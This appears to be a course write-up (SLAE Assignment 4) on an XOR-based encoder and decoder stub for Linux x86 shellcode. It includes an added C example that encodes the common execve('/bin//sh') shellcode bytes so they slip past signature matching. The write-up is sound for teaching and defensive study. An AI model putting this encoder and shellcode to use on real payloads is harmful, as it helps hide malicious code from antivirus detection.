SLAE Assignment 4: Custom scheme encrypted shellcode

Hiding in bits ...

Hint: it's easier to read the code on GitHub!

Hello!

Today we need to create a custom encoder for our beloved shellcodes. Again, the scheme must be original. Spoiler: I had a hard time deciding on a scheme and went for a dead simple one.

The main thing I knew is that encoders at the assembly level rely on XOR: for a given key bit, the two output values are equally likely, so the encoded bytes are not biased toward some values, and XOR is its own inverse, so the decoder is the same loop as the encoder. I asked around for simple ideas for a new scheme and received a simple answer: why not decompose XOR? Since I don't have a better idea for now, let's do this!


Designing the scheme

I know you are dying to read the masterplan (/sarcasm):
- Create an encoding tool which can encode any shellcode using our scheme;
- Create an encoding scheme using a decomposition of XOR;
- Pick an arbitrary static one-byte key;
- Create a decoder stub which decodes the encoded shellcode and executes it (the stub plus the encoded payload is the shellcode actually delivered).


Coding the encoder / decoder stub


We need to create an encoder which eats our shellcode and spits out an encoded shellcode. I decided to code the encoder in assembly because ... this is an assembly course and I want to get better at assembly. The drawback is that you need to put the shellcode inside the .nasm assembly file first. Anyway, this can be scripted pretty fast if you need to.


Now what is XOR exactly doing?

Basically XOR is doing this:
source: https://en.wikipedia.org/wiki/Exclusive_or

A XOR B = ( A OR B ) AND NOT ( A AND B )

Done. It relies on NOT, AND and OR.

So let's reproduce this scheme in assembly and try not to fail with parenthesis priority :). One thing to keep in mind: the NOT instruction flips all the bits of the register, not just the ones of interest, so the final AND with (A OR B) is what brings the result back to the plain XOR of the two bytes. Also work on byte-sized registers (AL, BL, ...) so the intermediate values never leak into the upper bytes.



Now that the encoded shellcode is written to stdout, you can redirect it to a file or pipe it through hexdump to get the bytecode. Check that none of the encoded bytes is 0x00: any input byte equal to the key encodes to a null, which would truncate the payload in any string-based injection, so pick another key if that happens.

Let's code a decoder stub and run the decoded shellcode. The stub itself must be null-free as well (for instance, load the length into CL rather than ECX), which is easy to verify by disassembling it with objdump -d and looking for 0x00 bytes.
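The encoder, the decoder loop and the checks a practitioner wants around them, as an added example in C rather than the post's own NASM code (which lives on GitHub): it implements the (A OR B) AND NOT (A AND B) decomposition byte by byte, refuses keys that would produce a null byte, round-trips a constructed sample (the common execve("/bin//sh") shellcode) and shows that one known plaintext byte recovers the key. The sample bytes, the 0xaa starting key and the function names are this example's own assumptions, not the post's.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Constructed sample input: the common Linux x86 execve("/bin//sh") shellcode
 * (23 bytes). Any shellcode works; the bytes only matter for the null check. */
static const uint8_t SAMPLE[] = {
    0x31, 0xc0, 0x50, 0x68, 0x2f, 0x2f, 0x73, 0x68, 0x68, 0x2f, 0x62, 0x69,
    0x6e, 0x89, 0xe3, 0x50, 0x53, 0x89, 0xe1, 0xb0, 0x0b, 0xcd, 0x80 };
#define SAMPLE_LEN (sizeof SAMPLE)

/* A XOR B = (A OR B) AND NOT (A AND B): the decomposition the post uses.
 * NOT flips all eight bits, but the AND with (A OR B) masks them back,
 * so the result is the plain byte-wise XOR. */
static uint8_t xor_decomposed(uint8_t a, uint8_t b)
{
    uint8_t a_or_b  = a | b;
    uint8_t a_and_b = a & b;
    return (uint8_t)(a_or_b & (uint8_t)~a_and_b);
}

/* A static one-byte key is usable only if no plaintext byte equals it:
 * byte ^ key == 0 would put a null into the encoded payload. Key 0 is
 * rejected because it leaves the shellcode unchanged. */
static int key_is_safe(const uint8_t *sc, size_t len, uint8_t key)
{
    if (key == 0)
        return 0;
    for (size_t i = 0; i < len; i++)
        if (sc[i] == key)
            return 0;
    return 1;
}

/* First safe key at or above `start` (assumed search order), or -1 if none. */
static int pick_key(const uint8_t *sc, size_t len, uint8_t start)
{
    for (int k = start; k <= 0xff; k++)
        if (key_is_safe(sc, len, (uint8_t)k))
            return k;
    return -1;
}

/* Encoder and decoder are the same loop: XOR is its own inverse. */
static void xor_buf(const uint8_t *in, uint8_t *out, size_t len, uint8_t key)
{
    for (size_t i = 0; i < len; i++)
        out[i] = xor_decomposed(in[i], key);
}

/* Encode, decode and verify: returns 1 if the encoded buffer is null-free
 * and decoding restores the original bytes, 0 otherwise. */
static int roundtrip_ok(const uint8_t *sc, size_t len, uint8_t key)
{
    uint8_t enc[256], dec[256];
    if (len > sizeof enc)
        return 0;
    xor_buf(sc, enc, len, key);
    for (size_t i = 0; i < len; i++)
        if (enc[i] == 0x00)
            return 0;
    xor_buf(enc, dec, len, key);
    return memcmp(sc, dec, len) == 0;
}

/* Why this is obfuscation rather than encryption: one known plaintext byte
 * (the trailing int 0x80 = 0xcd 0x80) hands back the whole key. */
static uint8_t recover_key(uint8_t encoded_byte, uint8_t known_plain)
{
    return encoded_byte ^ known_plain;
}

int main(void)
{
    int key = pick_key(SAMPLE, SAMPLE_LEN, 0xaa);
    if (key < 0) {
        fputs("no null-free one-byte key exists for this shellcode\n", stderr);
        return 1;
    }
    uint8_t enc[SAMPLE_LEN];
    xor_buf(SAMPLE, enc, SAMPLE_LEN, (uint8_t)key);

    /* Printed in the form you would paste into the decoder stub's db line. */
    printf("key: 0x%02x\nencoded: ", key);
    for (size_t i = 0; i < SAMPLE_LEN; i++)
        printf("0x%02x%s", enc[i], i + 1 < SAMPLE_LEN ? "," : "\n");

    printf("roundtrip: %s\n",
           roundtrip_ok(SAMPLE, SAMPLE_LEN, (uint8_t)key) ? "ok" : "FAILED");
    printf("key recovered from last byte: 0x%02x\n",
           recover_key(enc[SAMPLE_LEN - 1], 0x80));
    return 0;
}
```

The null check is the part most often forgotten when hand-rolling a one-byte key: with 0x50 as the key, the `push eax` bytes of the sample would encode to 0x00 and the payload would be cut short, which is why `pick_key` skips such keys rather than relying on luck.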


Let's try it.



Everything works fine, puuuuurfect!! We now have a XOR encoder and decoder stub in assembly. Of course it's quite simplistic: it encodes one byte at a time with a static one-byte key, so a single known plaintext byte (the 0xcd 0x80 of int 0x80 that almost every 32-bit Linux shellcode contains) gives the key straight back. This is obfuscation against signature matching, not encryption. But that simplicity avoids any padding issue, and we will see a more complex encoder in Assignment 7.


 
This blog post has been created for completing the requirements of the SecurityTube Linux Assembly Expert certification: http://securitytube-training.com/online-courses/securitytube-linux-assembly-expert/

SLAE - xxx
